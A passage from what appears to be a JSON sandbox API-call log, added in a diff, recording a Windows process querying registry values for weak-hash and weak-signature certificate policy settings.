"FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5ThirdPartyFlags" + } + ], + "repeated": 0, + "id": 2852 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakMD5ThirdPartyAfterTime" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5ThirdPartyAfterTime" + } + ], + "repeated": 0, + "id": 2853 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakMD5ThirdPartyAfterTime" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x00\\xc0)\\xb8C\\x9a\\xc9\\x01" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5ThirdPartyAfterTime" + } + ], + "repeated": 0, + "id": 2854 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767e53c2", + "parentcaller": "0x767ff778", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2855 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakMD5AllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakMD5AllFlags" + } + ], + "repeated": 0, + "id": 2856 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "WeakMD5AllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakMD5AllFlags" + } + ], + "repeated": 0, + "id": 2857 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakMD5AllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5AllFlags" + } + ], + "repeated": 0, + "id": 2858 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "ValueName", + "value": "WeakMD5AllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakMD5AllFlags" + } + ], + "repeated": 0, + "id": 2859 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakMD5ThirdPartySha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakMD5ThirdPartySha256Allow" + } + ], + "repeated": 0, + "id": 2860 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakMD5AllSha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakMD5AllSha256Allow" + } + ], + "repeated": 0, + "id": 2861 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakMD5ThirdPartySha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5ThirdPartySha256Allow" + } + ], + "repeated": 1, + "id": 2862 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakMD5ThirdPartySha256Allow" + }, + { + "name": "Type", + "value": "7", + "pretty_value": "REG_MULTI_SZ" + }, + { + "name": "Information", + "value": "\\x00\\x00\\x001P\\xd3b0\\x756a\\x5410\\xac00\\x1b\\x1000t\\x2a6c" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5ThirdPartySha256Allow" + } + ], + "repeated": 0, + "id": 2863 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakMD5AllSha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5AllSha256Allow" + } + ], + "repeated": 0, + "id": 2864 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "WeakMD5ThirdPartySha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakMD5ThirdPartySha256Allow" + } + ], + "repeated": 0, + "id": 2865 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "WeakMD5AllSha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakMD5AllSha256Allow" + } + ], + "repeated": 0, + "id": 2866 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "ValueName", + "value": "WeakMD5ThirdPartySha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakMD5ThirdPartySha256Allow" + } + ], + "repeated": 0, + "id": 2867 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "ValueName", + "value": "WeakMD5AllSha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakMD5AllSha256Allow" + } + ], + "repeated": 0, + "id": 2868 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakSHA1ThirdPartyFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakSHA1ThirdPartyFlags" + } + ], + "repeated": 0, + "id": 2869 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakSHA1ThirdPartyFlags" + }, + { + "name": "Type", + "value": "4", + "pretty_value": "REG_DWORD" + }, + { + "name": "Information", + "value": "18446744071562330112" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakSHA1ThirdPartyFlags" + } + ], + "repeated": 0, + "id": 2870 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakSHA1ThirdPartyAfterTime" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakSHA1ThirdPartyAfterTime" + } + ], + "repeated": 0, + "id": 2871 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakSHA1AllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakSHA1AllFlags" + } + ], + "repeated": 0, + "id": 2872 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "WeakSHA1AllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakSHA1AllFlags" + } + ], + "repeated": 0, + "id": 2873 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakSHA1AllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakSHA1AllFlags" + } + ], + "repeated": 0, + "id": 2874 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "ValueName", + "value": "WeakSHA1AllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakSHA1AllFlags" + } + ], + "repeated": 0, + "id": 2875 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakSHA1ThirdPartySha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakSHA1ThirdPartySha256Allow" + } + ], + "repeated": 0, + "id": 2876 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakSHA1AllSha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakSHA1AllSha256Allow" + } + ], + "repeated": 0, + "id": 2877 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakSHA1ThirdPartySha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakSHA1ThirdPartySha256Allow" + } + ], + "repeated": 0, + "id": 2878 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakSHA1AllSha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakSHA1AllSha256Allow" + } + ], + "repeated": 0, + "id": 2879 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "WeakSHA1ThirdPartySha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakSHA1ThirdPartySha256Allow" + } + ], + "repeated": 0, + "id": 2880 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "WeakSHA1AllSha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakSHA1AllSha256Allow" + } + ], + "repeated": 0, + "id": 2881 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "ValueName", + "value": "WeakSHA1ThirdPartySha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakSHA1ThirdPartySha256Allow" + } + ], + "repeated": 0, + "id": 2882 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "ValueName", + "value": "WeakSHA1AllSha256Allow" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakSHA1AllSha256Allow" + } + ], + "repeated": 0, + "id": 2883 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakRSAThirdPartyFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakRSAThirdPartyFlags" + } + ], + "repeated": 0, + "id": 2884 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakRSAThirdPartyFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakRSAThirdPartyFlags" + } + ], + "repeated": 0, + "id": 2885 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakRSAAllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakRSAAllFlags" + } + ], + "repeated": 0, + "id": 2886 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakRSAAllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakRSAAllFlags" + } + ], + "repeated": 0, + "id": 2887 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakDSAThirdPartyFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakDSAThirdPartyFlags" + } + ], + "repeated": 0, + "id": 2888 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakDSAThirdPartyFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakDSAThirdPartyFlags" + } + ], + "repeated": 0, + "id": 2889 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakDSAAllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakDSAAllFlags" + } + ], + "repeated": 0, + "id": 2890 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakDSAAllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakDSAAllFlags" + } + ], + "repeated": 0, + "id": 2891 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakECDSAThirdPartyFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakECDSAThirdPartyFlags" + } + ], + "repeated": 0, + "id": 2892 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakECDSAThirdPartyFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakECDSAThirdPartyFlags" + } + ], + "repeated": 0, + "id": 2893 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "WeakECDSAAllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakECDSAAllFlags" + } + ], + "repeated": 0, + "id": 2894 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "ValueName", + "value": "WeakECDSAAllFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakECDSAAllFlags" + } + ], + "repeated": 0, + "id": 2895 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 2, + "id": 2896 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": 